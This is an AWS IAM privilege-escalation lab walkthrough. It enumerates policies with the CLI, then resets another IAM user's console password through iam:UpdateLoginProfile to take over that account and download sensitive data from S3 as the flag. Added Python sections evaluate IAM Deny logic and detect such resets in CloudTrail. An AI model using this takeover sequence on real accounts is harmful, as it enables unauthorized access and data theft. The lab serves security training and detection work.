AWS IAM Privilege Escalation Labs

iam:UpdateLoginProfile Solution

Christophe November 19, 2023

Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile.

aws configure --profile updatelogin

Enumerate your user’s permissions:

aws iam list-groups --profile updatelogin
{
    "Groups": [
        {
            "Path": "/",
            "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
            "GroupId": "AGPA5M7PA4Z555SJEHAYD",
            "Arn": "arn:aws:iam::921234892411:group/iam-updateloginprofile-privesc-1701726668596-Developers",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

List policies for this group:

aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1701726668596-Developers --profile updatelogin

{
    "PolicyNames": [
        "iam-updateloginprofile-privesc-1701726668596-policy"
    ]
}

Now list the permissions in this policy:

aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1701726668596-Developers --policy-name iam-updateloginprofile-privesc-1701726668596-policy --profile updatelogin

{
    "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
    "PolicyName": "iam-updateloginprofile-privesc-1701726668596-policy",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:ListGroupPolicies",
                    "iam:ListPolicies",
                    "iam:ListPolicyVersions",
                    "iam:ListUserPolicies",
                    "iam:ListUsers",
                    "iam:ListGroups",
                    "iam:ListGroupsForUser",
                    "iam:GetPolicy",
                    "iam:GetPolicyVersion",
                    "iam:GetRole",
                    "iam:GetRolePolicy",
                    "iam:GetUser",
                    "iam:GetUserPolicy",
                    "iam:GetGroupPolicy"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:GetObject"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411/*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListAllMyBuckets",
                    "s3:GetBucketLocation"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }
        ]
    }
}

Viewing your policy returns quite a bit of information, including that you are able to list users in this account:

aws iam list-users --profile updatelogin

{
    "Users": [
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Alice",
            "UserId": "AIDA5M7PA4Z5VBTREZO3L",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Attacker",
            "UserId": "AIDA5M7PA4Z5TE63N6QMD",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
            "CreateDate": "2023-12-04T21:51:14+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Bob",
            "UserId": "AIDA5M7PA4Z5SGDBSVMK6",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Mark",
            "UserId": "AIDA5M7PA4Z57CYAWOOIP",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

This result shows that, besides our own Attacker user, there are three other IAM users:

  • Alice
  • Bob
  • Mark

Which one should we attack?

Well, if we look at the IAM policy attached to our group, we have:

{
    "Action": [
        "iam:UpdateLoginProfile",
        "iam:ListAccessKeys",
        "iam:ListAttachedUserPolicies"
    ],
    "Resource": [
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
    ],
    "Effect": "Allow"
}

But then we have an explicit deny:

{
    "Action": [
        "iam:UpdateLoginProfile"
    ],
    "Resource": [
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
        "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
    ],
    "Effect": "Deny"
}

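An explicit Deny always overrides an Allow, so we cannot call UpdateLoginProfile on Mark (allowed, then explicitly denied) or on Alice (never allowed, and explicitly denied as well). That leaves Bob, who appears in the Allow statement but not in the Deny statement.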
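The same reasoning as an added example (not part of the original lesson): a minimal evaluator for a single identity policy that applies the explicit-Deny-wins rule to the two statements quoted above. It assumes no Condition, NotAction or NotResource elements and ignores other policies, permission boundaries and SCPs; the function names are made up for illustration.

```python
import re

# The two relevant statements from the group policy shown above (same ARNs).
PREFIX = "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-"
POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["iam:UpdateLoginProfile", "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"],
         "Resource": [PREFIX + "Attacker", PREFIX + "Mark", PREFIX + "Bob"]},
        {"Effect": "Deny",
         "Action": ["iam:UpdateLoginProfile"],
         "Resource": [PREFIX + "Attacker", PREFIX + "Mark", PREFIX + "Alice"]},
    ],
}

def _as_list(value):
    # Policy elements may be a single string or a list of strings.
    return value if isinstance(value, list) else [value]

def _glob(pattern, value, ignore_case=False):
    # IAM wildcards: '*' matches any run of characters, '?' exactly one.
    regex = re.escape(pattern).replace(r"\*", ".*").replace(r"\?", ".")
    return re.fullmatch(regex, value, re.I if ignore_case else 0) is not None

def evaluate(policy, action, resource):
    """Return 'ExplicitDeny', 'Allow' or 'ImplicitDeny' for one policy."""
    allowed = False
    for stmt in _as_list(policy["Statement"]):
        # Action names are case-insensitive; resource ARNs are not.
        if not any(_glob(a, action, True) for a in _as_list(stmt.get("Action", []))):
            continue
        if not any(_glob(r, resource) for r in _as_list(stmt.get("Resource", []))):
            continue
        if stmt["Effect"] == "Deny":
            return "ExplicitDeny"  # one matching Deny ends the evaluation
        allowed = True
    return "Allow" if allowed else "ImplicitDeny"

def exposed_users(policy, action, user_arns):
    """List the users on which the policy holder can actually perform `action`."""
    return [arn for arn in user_arns if evaluate(policy, action, arn) == "Allow"]

if __name__ == "__main__":
    users = [PREFIX + n for n in ("Alice", "Attacker", "Bob", "Mark")]
    for arn in users:
        print(arn.rsplit("-", 1)[1], evaluate(POLICY, "iam:UpdateLoginProfile", arn))
```

Run against a policy under review, `exposed_users` shows which accounts a holder of that policy could reset the console password for, which is the question to ask before granting iam:UpdateLoginProfile.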

aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1701726668596-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile updatelogin

We can now use the username, the AWS account ID, and the password we set to log in to the AWS console:

https://signin.aws.amazon.com/signin

Once logged in (sometimes it can be finicky), make sure you change to “N. Virginia” as the region. It might default to something else.

From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download. Submit the flag by copy/pasting Joshua Lee’s credit card number.
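
For defenders, the update-login-profile call above is logged by CloudTrail as an UpdateLoginProfile event. The following added example (not part of the original lesson) flags such events where the caller is not the target user; the log records and user names are constructed, and it assumes one JSON record per line.

```python
import json

# Constructed CloudTrail records, one JSON object per line (illustrative values).
SAMPLE_LOG = """\
{"eventTime":"2023-12-04T22:00:01Z","eventSource":"iam.amazonaws.com","eventName":"ListUsers","sourceIPAddress":"198.51.100.7","userIdentity":{"type":"IAMUser","userName":"lab-Attacker"},"requestParameters":null}
{"eventTime":"2023-12-04T22:01:10Z","eventSource":"iam.amazonaws.com","eventName":"UpdateLoginProfile","errorCode":"AccessDenied","sourceIPAddress":"198.51.100.7","userIdentity":{"type":"IAMUser","userName":"lab-Attacker"},"requestParameters":{"userName":"lab-Mark","passwordResetRequired":false}}
{"eventTime":"2023-12-04T22:01:42Z","eventSource":"iam.amazonaws.com","eventName":"UpdateLoginProfile","sourceIPAddress":"198.51.100.7","userIdentity":{"type":"IAMUser","userName":"lab-Attacker"},"requestParameters":{"userName":"lab-Bob","passwordResetRequired":false}}
{"eventTime":"2023-12-04T23:15:00Z","eventSource":"iam.amazonaws.com","eventName":"UpdateLoginProfile","sourceIPAddress":"203.0.113.20","userIdentity":{"type":"IAMUser","userName":"lab-Alice"},"requestParameters":{"userName":"lab-Alice","passwordResetRequired":false}}
"""

def find_cross_user_resets(lines):
    """Return one finding per UpdateLoginProfile call made on another user."""
    findings = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        if ev.get("eventSource") != "iam.amazonaws.com":
            continue
        if ev.get("eventName") != "UpdateLoginProfile":
            continue
        # userName is absent for role sessions; those are reported too,
        # because a role changing a user's password is still cross-principal.
        caller = ev.get("userIdentity", {}).get("userName")
        params = ev.get("requestParameters") or {}
        target = params.get("userName")
        if target is not None and caller == target:
            continue  # user changed their own console password
        findings.append({
            "time": ev.get("eventTime"),
            "caller": caller,
            "target": target,
            "source_ip": ev.get("sourceIPAddress"),
            # Denied attempts are kept: they show probing of other accounts.
            "outcome": "denied" if ev.get("errorCode") else "succeeded",
            # True when the new password was set without forcing a reset.
            "reset_skipped": params.get("passwordResetRequired") is False,
        })
    return findings

if __name__ == "__main__":
    for finding in find_cross_user_resets(SAMPLE_LOG.splitlines()):
        print(finding)
```

A denied attempt followed shortly by a success from the same caller, as in the sample, is worth alerting on, together with any console sign-in by the target user soon afterwards.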
